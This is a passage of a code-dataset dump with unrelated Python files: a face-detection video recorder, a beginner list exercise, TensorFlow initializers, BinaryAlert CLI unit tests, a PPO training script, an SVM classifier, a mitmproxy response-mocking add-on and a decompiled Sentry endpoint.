(640,480),True);\n        out.write(frame)\n        print(save_name+' frame write start')\n        DetectCount+=1\n    \n    elif DetectCount>=1 and FrameCount<recordtime:\n        out.write(frame)\n    \n    elif DetectCount>=1 and FrameCount>=recordtime:\n        out.release()\n        print(save_name+\"is released\")\n        upload_main()\n        print(\"file uploaded\")\n        FrameCount=-1\n        DetectCount=0\n    \n\n    FrameCount+=1\n    # cv2.imshow(\"Face Detector\", frame)\n\n    # key = cv2.waitKey(delay) \n    # if key == ord('q') or key == ord('Q'):\n    #     print(\"종료키 입력받음 -upload file\")\n    \n    #     upload_main()\n    # 
break\n\n\nvideo.release()\ncv2.destroyAllWindows()\n\n\n","sub_path":"Ras_server.py","file_name":"Ras_server.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"167582875","text":"num = list()\r\n\r\nmenor = maior = 0\r\nfor cont in range(0, 5):\r\n    num.append(int(input('Digite um valor inteiro: ')))\r\n    if cont == 0:\r\n        maior = menor = num[cont]\r\n    else:\r\n        if num[cont] <= menor:\r\n            menor = num[cont]\r\n        if num[cont] >= maior:\r\n            maior = num[cont]\r\n\r\nprint(f'\\nA lista que você digitou foi {num}')\r\n\r\nfor c, v in enumerate(num):\r\n    if v == maior:\r\n        print(f'O maior valor digitado foi {max(num)} na posição {c+1}')\r\n    if v == menor:\r\n        print(f'O menor valor digitado foi {min(num)} na posição {c+1}')","sub_path":"Desafio078.py","file_name":"Desafio078.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"239302049","text":"import tensorflow as tf\nfrom tensorflow.python.ops.init_ops import Initializer\nfrom tensorflow.python.util.tf_export import tf_export\n\ntf_export(\"initializers.half\")\nclass half(Initializer):\n    def __init__(self, seed=None, dtype=tf.float32):\n        self.seed = seed\n        self.dtype = dtype\n\n    def __call__(self, shape, dtype=None, partition_info=None):\n        if dtype is None:\n            dtype = self.dtype\n        return 0.5*tf.ones(shape,dtype=dtype)\n\ntf_export(\"initializers.transform\")\nclass TransformInitializer(Initializer):\n    def __init__(self, base_initializer, transformations, seed=None, dtype=tf.float32):\n        self.transformations = transformations\n        self.seed = seed\n        self.dtype = dtype\n        self.base_initializer = base_initializer\n\n    def __call__(self, shape, dtype=None, partition_info=None):\n        if dtype is None:\n            dtype = self.dtype\n        V = {\"tf\":tf}\n        V[\"x\"] = self.base_initializer(seed=self.seed)(shape,dtype=dtype)\n        for t in self.transformations:\n            V[\"x\"] = eval(t,V)\n        return V[\"x\"]\n","sub_path":"util/initializer.py","file_name":"initializer.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19534707","text":"# -*- coding: utf-8 -*-\n\"\"\"\nContains methods that will be used by many Sensor types.\nLast modified 6/20/15\n\"\"\"\nimport sys, os\nsys.path.append(os.path.dirname(__file__)[:-len(\"/Sensors\")])\nfrom constants import *\nfrom math import cos, sin, atan2\n\n# realign like in collisionCheck.py\ndef realignV(refstate, vstate):\n    tempx = vstate.x - refstate.x\n    tempy = vstate.y - refstate.y\n    newAngle = vstate.angle - refstate.angle\n    relativeDist = pow((pow(tempx,2) + pow(tempy,2)),.5)\n    relativeAngle = atan2(tempy,tempx)\n    rotationAngle = relativeAngle - refstate.angle\n    \n    realignedState = vstate.copy()\n    realignedState.x = relativeDist * cos(rotationAngle)\n    realignedState.y = relativeDist * sin(rotationAngle)\n    realignedState.angle = newAngle\n    return realignedState\n    \n# returns the minimum distance of this car\n# w.r.t the front&center of the reference car\ndef distance(refstate, vstate):\n    tempx = vstate.x - refstate.x\n    tempy = vstate.y - refstate.y\n    # for now, be lazy and do this\n    return pow( pow(tempx,2.0) + pow(tempy,2.0), .5)","sub_path":"Sensors/usefulMethods.py","file_name":"usefulMethods.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
+{"seq_id":"36710018","text":"\"\"\"Unit tests for the manage.py CLI script.\"\"\"\n# pylint: disable=no-self-use,protected-access\nimport base64\nimport getpass\nimport inspect\nimport os\nimport subprocess\nimport sys\nfrom unittest import mock, TestCase\n\nimport boto3\nfrom pyfakefs import fake_filesystem_unittest\n\nimport manage\n\n\ndef _mock_input(prompt: str) -> str:\n \"\"\"Mock for the user input() function to automatically respond with valid answers.\"\"\"\n # pylint: disable=too-many-return-statements\n if prompt.startswith('AWS Account'):\n return '111122223333'\n if prompt.startswith('AWS Region'):\n return 'us-west-2'\n if prompt.startswith('Unique name prefix'):\n return ' NEW_NAME_PREFIX ' # Spaces and case shouldn't matter.\n if prompt.startswith('Enable the CarbonBlack downloader'):\n return 'yes'\n if prompt.startswith('CarbonBlack URL'):\n return 'https://new-example.com'\n if prompt.startswith('Change the CarbonBlack API token'):\n return 'yes'\n if prompt.startswith('Delete all S3 objects'):\n return 'yes'\n return 'UNKNOWN'\n\n\nclass FakeFilesystemBase(fake_filesystem_unittest.TestCase):\n \"\"\"Base class sets up a fake filesystem for other test classes.\"\"\"\n\n @staticmethod\n def _write_config(\n account_id: str = '123412341234',\n region: str = 'us-test-1',\n prefix: str = 'test_prefix',\n enable_downloader: bool = True,\n cb_url: str = 'https://cb-example.com',\n encrypted_api_token: str = 'A'*100):\n \"\"\"Create terraform.tfvars file with the given configuration values.\"\"\"\n with open(manage.CONFIG_FILE, 'w') as config_file:\n config_file.write('\\n'.join([\n '// comment1',\n 'aws_account_id = \"{}\"'.format(account_id),\n 'aws_region = \"{}\" // comment2'.format(region),\n 'name_prefix = \"{}\" // comment3'.format(prefix),\n 'enable_carbon_black_downloader = {}'.format(1 if enable_downloader else 0),\n 'carbon_black_url = \"{}\" //comment4'.format(cb_url),\n 'encrypted_carbon_black_api_token = \"{}\"'.format(encrypted_api_token),\n 'force_destroy = false',\n '// comment5'\n ]))\n\n def setUp(self):\n \"\"\"Enable pyfakefs and write out Terraform config files.\"\"\"\n # pylint: disable=no-member\n self.setUpPyfakefs()\n\n # pyhcl automatically writes \"parsetab.dat\" in its site-package path.\n for path in sys.path:\n if path.endswith('site-packages'):\n self.fs.MakeDirectories(os.path.join(path, 'hcl'))\n\n # Create variables.tf file (and terraform/ directory).\n self.fs.CreateFile(\n manage.VARIABLES_FILE,\n contents='\\n'.join([\n 'variable \"aws_account_id\" {}',\n 'variable \"aws_region\" {}',\n 'variable \"name_prefix\" {}',\n 'variable \"enable_carbon_black_downloader\" {}',\n 'variable \"carbon_black_url\" {}',\n 'variable \"encrypted_carbon_black_api_token\" {}'\n ])\n )\n\n # Create terraform.tfvars file.\n self._write_config()\n\n\n@mock.patch.object(sys, 'stderr', mock.MagicMock()) # pyhcl complains about unused tokens\nclass BinaryAlertConfigTestFakeFilesystem(FakeFilesystemBase):\n \"\"\"Tests of the BinaryAlertConfig class that use a fake filesystem.\"\"\"\n\n def test_property_accesses(self):\n \"\"\"Access each property in the BinaryAlertConfig.\"\"\"\n config = manage.BinaryAlertConfig()\n\n self.assertEqual('123412341234', config.aws_account_id)\n self.assertEqual('us-test-1', config.aws_region)\n self.assertEqual('test_prefix', config.name_prefix)\n self.assertEqual(1, config.enable_carbon_black_downloader)\n self.assertEqual('https://cb-example.com', config.carbon_black_url)\n self.assertEqual('A' * 100, 
config.encrypted_carbon_black_api_token)\n self.assertEqual('test_prefix_binaryalert_batcher', config.binaryalert_batcher_name)\n self.assertEqual('test.prefix.binaryalert-binaries.us-test-1',\n config.binaryalert_s3_bucket_name)\n\n def test_variable_not_defined(self):\n \"\"\"InvalidConfigError is raised if a variable declaration is missing.\"\"\"\n with open(manage.CONFIG_FILE, 'w') as config_file:\n config_file.write('aws_region = \"us-east-1\"\\n')\n\n with self.assertRaises(manage.InvalidConfigError):\n manage.BinaryAlertConfig()\n\n def test_invalid_aws_account_id(self):\n \"\"\"InvalidConfigError raised if AWS account ID is not a 12-digit number\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.aws_account_id = '1234'\n\n def test_invalid_aws_region(self):\n \"\"\"InvalidConfigError raised if AWS region is set incorrectly.\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.aws_region = 'us-east-1-'\n\n def test_invalid_name_prefix(self):\n \"\"\"InvalidConfigError raised if name prefix is blank.\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.name_prefix = \"\"\n\n def test_invalid_enable_carbon_black_downloader(self):\n \"\"\"InvalidConfigError raised if enable_downloader is not an int.\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.enable_carbon_black_downloader = '1'\n\n def test_invalid_carbon_black_url(self):\n \"\"\"InvalidConfigError raised if URL doesn't start with http(s).\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.carbon_black_url = 'example.com'\n\n def test_invalid_encrypted_carbon_black_api_token(self):\n \"\"\"InvalidConfigError raised if encrypted token is too short.\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.encrypted_carbon_black_api_token = 'ABCD'\n\n @mock.patch.object(manage, 'input', side_effect=_mock_input)\n @mock.patch.object(manage.BinaryAlertConfig, '_encrypt_cb_api_token')\n def test_configure_with_defaults(\n self, mock_encrypt: mock.MagicMock, mock_input: mock.MagicMock):\n \"\"\"Test configure() when all variables have already had set values.\"\"\"\n config = manage.BinaryAlertConfig()\n config.configure()\n\n # Verify the mock calls.\n mock_encrypt.assert_called_once()\n mock_input.assert_has_calls([\n mock.call('AWS Region (us-test-1): '),\n mock.call('Unique name prefix, e.g. \"company_team\" (test_prefix): '),\n mock.call('Enable the CarbonBlack downloader? (yes): '),\n mock.call('CarbonBlack URL (https://cb-example.com): '),\n mock.call('Change the CarbonBlack API token? 
(no): ')\n ])\n\n # Verify that the configuration has changed.\n self.assertEqual('us-west-2', config.aws_region)\n self.assertEqual('new_name_prefix', config.name_prefix)\n self.assertEqual(1, config.enable_carbon_black_downloader)\n\n @mock.patch.object(manage, 'input', side_effect=_mock_input)\n @mock.patch.object(manage.BinaryAlertConfig, '_encrypt_cb_api_token')\n def test_configure_with_no_defaults(\n self, mock_encrypt: mock.MagicMock, mock_input: mock.MagicMock):\n \"\"\"Test configure() without any values set - no defaults should print.\"\"\"\n self._write_config(\n region='', prefix='', enable_downloader=False, cb_url='', encrypted_api_token=''\n )\n config = manage.BinaryAlertConfig()\n config.configure()\n\n # Verify the mock calls.\n mock_encrypt.assert_called_once()\n mock_input.assert_has_calls([\n mock.call('AWS Region: '),\n mock.call('Unique name prefix, e.g. \"company_team\": '),\n mock.call('Enable the CarbonBlack downloader? (no): '),\n mock.call('CarbonBlack URL: '),\n ])\n\n def test_validate_valid_with_downloader(self):\n \"\"\"Test validate() with all values set correctly.\"\"\"\n config = manage.BinaryAlertConfig()\n config.validate()\n\n # None of the instance properties should have changed.\n self.test_property_accesses()\n\n def test_validate_valid_without_downloader(self):\n \"\"\"Test validate() without any CarbonBlack values set - still valid.\"\"\"\n self._write_config(enable_downloader=False, cb_url='', encrypted_api_token='')\n config = manage.BinaryAlertConfig()\n config.validate()\n\n def test_validate_invalid(self):\n \"\"\"Test validate() with an invalid configuration file.\"\"\"\n self._write_config(region='BAD_REGION')\n config = manage.BinaryAlertConfig()\n\n with self.assertRaises(manage.InvalidConfigError):\n config.validate()\n\n def test_save(self):\n \"\"\"New configuration is successfully written and comments are preserved.\"\"\"\n config = manage.BinaryAlertConfig()\n config._config['force_destroy'] = True\n config.aws_region = 'us-west-2'\n config.name_prefix = 'new_name_prefix'\n config.enable_carbon_black_downloader = 0\n config.carbon_black_url = 'https://example2.com'\n config.encrypted_carbon_black_api_token = 'B' * 100\n config.save()\n\n # Verify that all of the original comments were preserved.\n with open(manage.CONFIG_FILE) as config_file:\n raw_data = config_file.read()\n for i in range(1, 6):\n self.assertIn('comment{}'.format(i), raw_data)\n\n new_config = manage.BinaryAlertConfig()\n self.assertEqual(True, new_config._config['force_destroy'])\n self.assertEqual(config.aws_region, new_config.aws_region)\n self.assertEqual(config.name_prefix, new_config.name_prefix)\n self.assertEqual(\n config.enable_carbon_black_downloader, new_config.enable_carbon_black_downloader)\n self.assertEqual(\n config.encrypted_carbon_black_api_token, new_config.encrypted_carbon_black_api_token)\n\n\nclass BinaryAlertConfigTestRealFilesystem(TestCase):\n \"\"\"Tests of the BinaryAlertConfig class that use a real filesystem.\"\"\"\n\n @mock.patch.object(boto3, 'client')\n @mock.patch.object(getpass, 'getpass', return_value='abcd' * 10)\n @mock.patch.object(manage, 'print')\n @mock.patch.object(subprocess, 'check_call')\n def test_encrypt_cb_api_token(\n self, mock_subprocess: mock.MagicMock, mock_print: mock.MagicMock,\n mock_getpass: mock.MagicMock, mock_client: mock.MagicMock):\n \"\"\"Verify that token encryption is done correctly.\"\"\"\n mock_client('kms').encrypt.return_value = {'CiphertextBlob': base64.b64encode(b'a'*50)}\n config = 
manage.BinaryAlertConfig()\n config._encrypt_cb_api_token()\n\n # Verify that the mocks were called as expected.\n mock_client.assert_has_calls([\n mock.call().encrypt(KeyId=mock.ANY, Plaintext=mock_getpass.return_value)\n ])\n mock_getpass.assert_called_once()\n mock_print.assert_has_calls([\n mock.call('Terraforming KMS key...'),\n mock.call('Encrypting API token...')\n ])\n mock_subprocess.assert_has_calls([\n mock.call(['terraform', 'init']),\n mock.call(['terraform', 'apply', '-target={}'.format(manage.CB_KMS_ALIAS_TERRAFORM_ID)])\n ])\n\n\nclass ManagerTest(FakeFilesystemBase):\n \"\"\"Tests for the Manager class.\"\"\"\n\n @mock.patch('sys.stderr', mock.MagicMock()) # pyhcl complains about unused tokens to stderr.\n def setUp(self):\n super().setUp()\n self.manager = manage.Manager()\n\n def test_commands(self):\n \"\"\"Each command should be a function in the class.\"\"\"\n for command in self.manager.commands:\n self.assertTrue(hasattr(self.manager, command))\n\n def test_help(self):\n \"\"\"Help string should contain as many lines as there are commands.\"\"\"\n self.assertEqual(len(self.manager.commands), len(self.manager.help.split('\\n')))\n\n @mock.patch.object(boto3, 'client')\n @mock.patch.object(manage, 'print')\n def test_analyze_all(self, mock_print: mock.MagicMock, mock_client: mock.MagicMock):\n \"\"\"Batch analysis invocation.\"\"\"\n self.manager.analyze_all()\n mock_print.assert_has_calls([\n mock.call('Asynchronously invoking test_prefix_binaryalert_batcher...'),\n mock.call('Batcher invocation successful!')\n ])\n mock_client.assert_has_calls([\n mock.call('lambda').invoke(\n FunctionName='test_prefix_binaryalert_batcher',\n InvocationType='Event',\n Qualifier='Production'\n )\n ])\n\n @mock.patch.object(subprocess, 'check_call')\n def test_apply(self, mock_subprocess: mock.MagicMock):\n \"\"\"Validate order of Terraform operations.\"\"\"\n self.manager.apply()\n mock_subprocess.assert_has_calls([\n mock.call(['terraform', 'init']),\n mock.call(['terraform', 'fmt']),\n mock.call(['terraform', 'apply', '-auto-approve=false'])\n ])\n\n @mock.patch.object(manage, 'lambda_build')\n def test_build(self, mock_build: mock.MagicMock):\n \"\"\"Calls lambda_build function (tested elsewhere).\"\"\"\n self.manager.build()\n mock_build.assert_called_once()\n\n def test_cb_copy_all_not_enabled(self):\n \"\"\"Raises InvalidConfigError if the downloader is not enabled.\"\"\"\n self._write_config(enable_downloader=False)\n self.manager = manage.Manager() # Reload manager with the new config.\n with self.assertRaises(manage.InvalidConfigError):\n self.manager.cb_copy_all()\n\n @mock.patch.object(manage.clone_rules, 'clone_remote_rules')\n def test_clone_rules(self, mock_clone: mock.MagicMock):\n \"\"\"Calls clone_remote_rules (tested elsewhere).\"\"\"\n self.manager.clone_rules()\n mock_clone.assert_called_once()\n\n @mock.patch.object(manage.compile_rules, 'compile_rules')\n @mock.patch.object(manage, 'print')\n def test_compile_rules(self, mock_print: mock.MagicMock, mock_compile: mock.MagicMock):\n \"\"\"Calls compile_rules (tested elsewhere).\"\"\"\n self.manager.compile_rules()\n mock_compile.assert_called_once()\n mock_print.assert_called_once()\n\n @mock.patch.object(manage.BinaryAlertConfig, 'configure')\n @mock.patch.object(manage, 'print')\n def test_configure(self, mock_print: mock.MagicMock, mock_configure: mock.MagicMock):\n \"\"\"Calls BinaryAlertConfig:configure() (tested elsewhere).\"\"\"\n self.manager.configure()\n mock_configure.assert_called_once()\n 
mock_print.assert_called_once()\n\n @mock.patch.object(manage.Manager, 'unit_test')\n @mock.patch.object(manage.Manager, 'build')\n @mock.patch.object(manage.Manager, 'apply')\n @mock.patch.object(manage.Manager, 'analyze_all')\n def test_deploy(self, mock_analyze: mock.MagicMock, mock_apply: mock.MagicMock,\n mock_build: mock.MagicMock, mock_test: mock.MagicMock):\n \"\"\"Deploy docstring includes each executed command and runs each.\"\"\"\n for command in ['unit_test', 'build', 'apply', 'analyze_all']:\n self.assertIn(command, inspect.getdoc(manage.Manager.deploy))\n\n self.manager.deploy()\n mock_test.assert_called_once()\n mock_build.assert_called_once()\n mock_apply.assert_called_once()\n mock_analyze.assert_called_once()\n\n @mock.patch.object(manage, 'input', side_effect=_mock_input)\n @mock.patch.object(manage, 'print')\n @mock.patch.object(subprocess, 'call')\n @mock.patch.object(subprocess, 'check_call')\n def test_destroy(self, mock_check_call: mock.MagicMock, mock_call: mock.MagicMock,\n mock_print: mock.MagicMock, mock_input: mock.MagicMock):\n \"\"\"Destroy asks whether S3 objects should also be deleted.\"\"\"\n self.manager.destroy()\n mock_input.assert_called_once()\n mock_print.assert_called_once()\n mock_check_call.assert_called_once()\n mock_call.assert_called_once()\n\n @mock.patch.object(manage.live_test, 'run', return_value=False)\n def test_live_test(self, mock_live_test: mock.MagicMock):\n \"\"\"Live test wrapper raises TestFailureError if appropriate.\"\"\"\n with self.assertRaises(manage.TestFailureError):\n self.manager.live_test()\n mock_live_test.assert_called_once()\n","sub_path":"tests/manage_test.py","file_name":"manage_test.py","file_ext":"py","file_size_in_byte":16707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"343277219","text":"from rest_framework import serializers\nfrom rest_framework_bulk import BulkListSerializer\nfrom rest_framework_bulk import BulkSerializerMixin\n\nfrom api.models import Favorite\n\n\nclass ArticleSerializer(serializers.Serializer):\n content = serializers.CharField()\n heading = serializers.CharField()\n image = serializers.URLField()\n references = serializers.ListField()\n summary = serializers.CharField()\n url = serializers.URLField()\n\n\nclass FavoriteSerializer(BulkSerializerMixin, serializers.ModelSerializer):\n owner = serializers.HiddenField(\n default=serializers.CurrentUserDefault()\n )\n\n class Meta:\n model = Favorite\n fields = ('title', 'owner')\n list_serializer_class = BulkListSerializer\n","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19954008","text":"from stable_baselines3 import PPO, SAC\nfrom stable_baselines3.common.utils import set_random_seed\nfrom stable_baselines3.common.vec_env import DummyVecEnv, VecNormalize\nfrom stable_baselines3.common.vec_env.vec_frame_stack import VecFrameStack\nfrom stable_baselines3.common.callbacks import CheckpointCallback\nfrom common import wrapper_custom_align, wrapper_diff, wrapper_mut\n\nimport common.common as common\nimport common.wrapper as wrapper\nimport common.gym_interface as gym_interface\nimport common.callbacks as callbacks\nfrom common.activation_fn import MyThreshold\n\nif __name__ == \"__main__\":\n\n args = common.args\n print(args)\n\n # SAC.learn need this. 
If use SubprocVecEnv instead of DummyVecEnv, you need to seed in each subprocess.\n set_random_seed(common.seed)\n\n saved_model_filename = common.build_model_filename(args)\n\n hyperparams = common.load_hyperparameters(conf_name=\"PPO\")\n print(hyperparams)\n\n # Make every env has the same obs space and action space\n default_wrapper = []\n # if padding zero:\n # default_wrapper.append(wrapper.WalkerWrapper)\n \n if args.topology_wrapper == \"same\":\n body_type = 0\n for body in args.train_bodies + args.test_bodies:\n if body_type==0:\n body_type = body//100\n else:\n assert body_type == body//100, \"Training on different body types.\"\n if args.realign_method!=\"\":\n default_wrapper.append(wrapper.ReAlignedWrapper)\n elif args.topology_wrapper == \"diff\":\n default_wrapper.append(wrapper_diff.get_wrapper_class())\n elif args.topology_wrapper == \"MutantWrapper\":\n default_wrapper.append(wrapper_mut.MutantWrapper)\n elif args.topology_wrapper == \"CustomAlignWrapper\":\n default_wrapper.append(wrapper_custom_align.CustomAlignWrapper)\n else:\n pass # no need for wrapper\n\n assert len(args.train_bodies) > 0, \"No body to train.\"\n if args.with_bodyinfo:\n default_wrapper.append(wrapper.BodyinfoWrapper)\n\n print(\"Making train environments...\")\n venv = DummyVecEnv([gym_interface.make_env(rank=i, seed=common.seed, wrappers=default_wrapper, render=args.render,\n robot_body=args.train_bodies[i % len(args.train_bodies)],\n dataset_folder=args.body_folder) for i in range(args.num_venvs)])\n\n normalize_kwargs = {}\n if args.vec_normalize:\n normalize_kwargs[\"gamma\"] = hyperparams[\"gamma\"]\n venv = VecNormalize(venv, **normalize_kwargs)\n\n if args.stack_frames > 1:\n venv = VecFrameStack(venv, args.stack_frames)\n\n keys_remove = [\"normalize\", \"n_envs\", \"n_timesteps\", \"policy\"]\n for key in keys_remove:\n if key in hyperparams:\n del hyperparams[key]\n\n print(\"Making eval environments...\")\n assert args.test_bodies==args.train_bodies, \"Because we need to match alignment plan, so they must be the same.\"\n all_callbacks = []\n for rank_idx, test_body in enumerate(args.test_bodies):\n body_info = 0\n eval_venv = DummyVecEnv([gym_interface.make_env(rank=rank_idx, seed=common.seed+1, wrappers=default_wrapper, render=False,\n robot_body=test_body, body_info=body_info,\n dataset_folder=args.body_folder)])\n if args.vec_normalize:\n eval_venv = VecNormalize(eval_venv, norm_reward=False, **normalize_kwargs)\n if args.stack_frames > 1:\n eval_venv = VecFrameStack(eval_venv, args.stack_frames)\n eval_callback = callbacks.EvalCallback_with_prefix(\n eval_env=eval_venv,\n best_model_save_path=str(common.output_data_folder/\"models\"/saved_model_filename),\n prefix=f\"{test_body}\",\n n_eval_episodes=3,\n eval_freq=int(args.eval_steps/args.num_venvs), # will implicitly multiplied by (train_num_envs)\n deterministic=True,\n )\n all_callbacks.append(eval_callback)\n\n if args.with_checkpoint:\n checkpoint_callback = CheckpointCallback(save_freq=1000, save_path=str(common.output_data_folder/'checkpoints'), name_prefix=args.train_bodies)\n all_callbacks.append(checkpoint_callback)\n if args.vec_normalize:\n save_vec_callback = callbacks.SaveVecNormalizeCallback(save_freq=1000, save_path=str(\n common.output_data_folder/'checkpoints'), name_prefix=args.train_bodies)\n all_callbacks.append(save_vec_callback)\n\n if args.skip_solved_threshold>0:\n skip_solved_callback = callbacks.SkipSolvedCallback(args.skip_solved_threshold)\n all_callbacks.append(skip_solved_callback)\n\n 
hyperparams['policy_kwargs']['activation_fn'] = MyThreshold\n\n model = PPO('MlpPolicy', venv, verbose=1, tensorboard_log=str(common.output_data_folder/args.tensorboard/saved_model_filename), seed=common.seed, **hyperparams)\n\n if len(args.initialize_weights_from) > 0:\n try:\n load_model = PPO.load(args.initialize_weights_from)\n load_weights = load_model.policy.state_dict()\n model.policy.load_state_dict(load_weights)\n print(f\"Weights loaded from {args.initialize_weights_from}\")\n except Exception:\n print(\"Initialize weights error.\")\n raise Exception\n\n try:\n model.learn(total_timesteps=args.train_steps, callback=all_callbacks)\n except KeyboardInterrupt:\n pass\n model.save(str(common.output_data_folder/\"models\"/saved_model_filename))\n\n if args.vec_normalize:\n # Important: save the running average, for testing the agent we need that normalization\n model.get_vec_normalize_env().save(str(common.output_data_folder/\"models\"/f\"{saved_model_filename}.vnorm.pkl\"))\n\n venv.close()\n","sub_path":"project/experiments/exp_028_arms_help/src/22.0.train.py","file_name":"22.0.train.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"90856808","text":"import matplotlib.pyplot as plt\n\n#from sklearn import svm\nfrom sklearn import svm\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report,accuracy_score\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.model_selection import learning_curve\nimport numpy as np\nfrom sklearn.model_selection import cross_val_score\nimport os, os.path\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\n\n#from tensorflow import keras\nimport itertools\n\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n \n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.tight_layout()\n \n from sklearn.model_selection import cross_val_score\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training 
score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n plt.legend(loc=\"best\")\n plt.grid(\"on\")\n if ylim:\n plt.ylim(ylim)\n plt.title(title)\n plt.show()\n\ndef img_SVM(training_images, training_labels, test_images, test_labels):\n classifier = svm.SVC(kernel='linear', C=0.1)\n cv = ShuffleSplit(n_splits=5, test_size=0.2, random_state=0)\n plot_learning_curve(classifier, 'The graph of learning curve Task A1', training_images, training_labels, (0.7, 1.01), cv=cv, n_jobs=4)\n #scores = cross_val_score(classifier, training_images, training_labels, cv=5)\n #print(\"val_Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n val_acc = 0\n \n classifier.fit(training_images, training_labels)\n pred = classifier.predict(test_images)\n print(\"Accuracy:\", accuracy_score(test_labels, pred))\n acc = accuracy_score(test_labels, pred)\n print(confusion_matrix(test_labels, pred))\n print(classification_report(test_labels, pred))\n \n cnf_matrix = confusion_matrix(test_labels, pred)\n np.set_printoptions(precision=2)\n class_names= ['male','female']\n # Plot non-normalized confusion matrix\n plt.figure()\n plot_confusion_matrix(cnf_matrix, classes=class_names,\n title='Confusion matrix, without normalization task A1')\n\n\n plt.show()\n\n # print(pred)\n return pred, acc, val_acc","sub_path":"AMLS_19-20_YUQIXU_SN18072225/A1/A1_SVM.py","file_name":"A1_SVM.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"211463543","text":"# -*- coding:utf-8 -*-\n__author__ = 'Tnew'\n\nimport mitmproxy\nfrom mitmproxy import ctx, http\nimport json\n\nclass Counter:\n def __init__(self):\n self.num = 0\n\n def request(self, flow):\n self.num = self.num + 1\n ctx.log.info(\"We've seen %d flows\" % self.num)\n\n def response(self, flow: http.HTTPFlow):\n \"\"\"\n The full HTTP response has been read.\n \"\"\"\n if \"https://stock.xueqiu.com/v5/stock/batch/quote.json?_t\" in flow.request.pretty_url:\n with open('data_new.json', 'r', encoding='utf-8') as f:\n #json.dump() 和 json.load() 来编码和解码JSON数据,用于处理文件\n #json.dumps,json.loads对string格式进行转换,dumps是将python对象转成str,loads是将str转成python对象(dict)\n data = json.load(f) #读取文件,将f文件中的内容读取到data中,格式为dict; json.dump(data,f1)将data里面的内容写入f1文件中,写入文件,Python不判断内容的内容格式\n flow.response.text = json.dumps(data)\n\n\n\naddons = [\n Counter()\n]","sub_path":"pratice_xueqiu_mock/mock_map_local/xueqiu_mock_map_local.py","file_name":"xueqiu_mock_map_local.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"593282338","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/src/sentry/src/sentry/api/endpoints/relay_projectconfigs.py\n# Compiled at: 2019-08-16 17:27:45\nfrom __future__ import absolute_import\nimport six\nfrom rest_framework.response import Response\nfrom sentry.api.base import Endpoint\nfrom sentry.api.permissions import RelayPermission\nfrom sentry.api.authentication import RelayAuthentication\nfrom sentry.relay import config\nfrom sentry.models import Project, Organization\n\nclass RelayProjectConfigsEndpoint(Endpoint):\n authentication_classes = (\n RelayAuthentication,)\n permission_classes = 